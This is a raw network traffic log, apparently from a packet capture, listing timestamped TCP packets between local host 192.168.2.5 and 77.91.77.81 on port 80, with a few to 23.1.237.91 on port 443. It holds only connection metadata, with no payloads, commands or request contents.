Jun 24, 2024 00:10:05.026623964 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026647091 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026658058 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026685953 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026726007 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026736975 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026777983 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026786089 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026798964 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026832104 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026875019 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026889086 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026900053 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026910067 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026921034 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026932955 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.026967049 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026967049 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.026993036 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027170897 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027224064 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027239084 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027251005 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027285099 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027309895 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027329922 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027343035 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027354002 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027367115 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027381897 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027405977 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027442932 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027456045 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027501106 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027524948 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027538061 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027579069 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027602911 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027654886 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027666092 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027676105 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027687073 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027698040 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027709961 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027730942 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027730942 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027761936 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027811050 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027822971 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027833939 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027844906 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027856112 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027856112 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027915955 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027929068 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027940989 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027945042 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027951956 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027962923 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027973890 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027976036 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027987003 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.027997017 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.027998924 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.028040886 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.028040886 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.028466940 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.028512955 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031367064 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031384945 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031398058 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031426907 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031439066 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031450033 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031450987 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031450033 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031465054 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031486988 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031507015 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031518936 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031524897 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031532049 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031558037 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031584978 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031686068 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031697989 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031709909 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031722069 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031734943 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031748056 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031750917 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031750917 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031781912 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031802893 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031841993 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031853914 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031864882 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031877041 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031888008 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031893969 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031898975 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031910896 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031914949 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031922102 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031935930 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.031936884 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031961918 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.031987906 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.032202959 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.032258034 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.032260895 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.032270908 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.032300949 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.032311916 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.032314062 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.032351971 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.032381058 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116127014 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116174936 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116231918 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116241932 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116265059 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116301060 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116316080 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116316080 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116316080 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116333961 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116369963 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116378069 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116379023 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116401911 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116415977 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116436005 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116447926 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116468906 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116499901 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116519928 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116540909 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116575956 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116590023 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116612911 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.116641045 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.116667032 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152498960 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152580023 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152601004 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152633905 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152636051 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152667999 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152678967 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152714014 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152719975 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152771950 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152791977 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152810097 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152822018 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152857065 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152868032 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152899981 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152910948 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.152952909 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.152966976 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153009892 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153037071 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153070927 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153083086 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153115988 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153121948 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153156042 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153183937 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153188944 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153199911 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153228045 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153233051 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153275967 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153279066 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153325081 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153332949 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153367043 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153383970 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153400898 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153412104 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153435946 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153445959 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153467894 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153481007 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153501987 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153513908 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153534889 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153544903 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153569937 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153578997 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153603077 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153611898 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153640032 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153652906 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153685093 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153693914 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153719902 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153729916 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153754950 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153767109 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153789043 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153799057 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153834105 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153841972 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153876066 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153891087 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153909922 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153928041 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153938055 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153944016 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.153944016 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153978109 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.153989077 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154011965 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154021025 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154043913 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154057026 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154078007 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154089928 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154110909 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154122114 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154156923 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154161930 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154194117 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154205084 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154227018 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154236078 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154261112 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154275894 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154297113 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154311895 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154330969 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154345989 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154364109 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154373884 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154397964 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154407024 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154432058 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154442072 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154465914 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154476881 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154500961 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154510975 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154551983 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154552937 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154587984 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154604912 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154619932 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154627085 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154653072 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154664040 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154686928 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154705048 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154722929 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154733896 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154758930 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154767036 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154793978 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154802084 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154828072 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154834986 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154863119 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154874086 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154896021 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154906034 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154931068 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154939890 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154964924 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.154980898 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.154999018 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155006886 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155033112 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155045033 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155066013 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155075073 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155098915 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155111074 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155133009 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155141115 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155167103 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155179024 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155200958 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155209064 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155234098 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155246019 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155267954 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155276060 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155306101 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.155311108 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.155354977 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.585824966 CEST	443	49703	23.1.237.91	192.168.2.5
Jun 24, 2024 00:10:05.585937023 CEST	49703	443	192.168.2.5	23.1.237.91
Jun 24, 2024 00:10:05.810045004 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.810422897 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.816123962 CEST	80	49705	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.816226006 CEST	49705	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.816973925 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:05.817058086 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.817243099 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:05.822350979 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.532876968 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.532958984 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.537372112 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.542253017 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.752974987 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753024101 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753060102 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753079891 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753079891 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753093958 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753112078 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753129959 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753148079 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753161907 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753175020 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753197908 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753204107 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753230095 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753242970 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753268003 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753304005 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753334045 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753576040 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753616095 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.753628016 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.753660917 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.758323908 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.758358002 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:06.758373976 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.758404016 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:06.870038986 CEST	80	49706	77.91.77.81	192.168.2.5
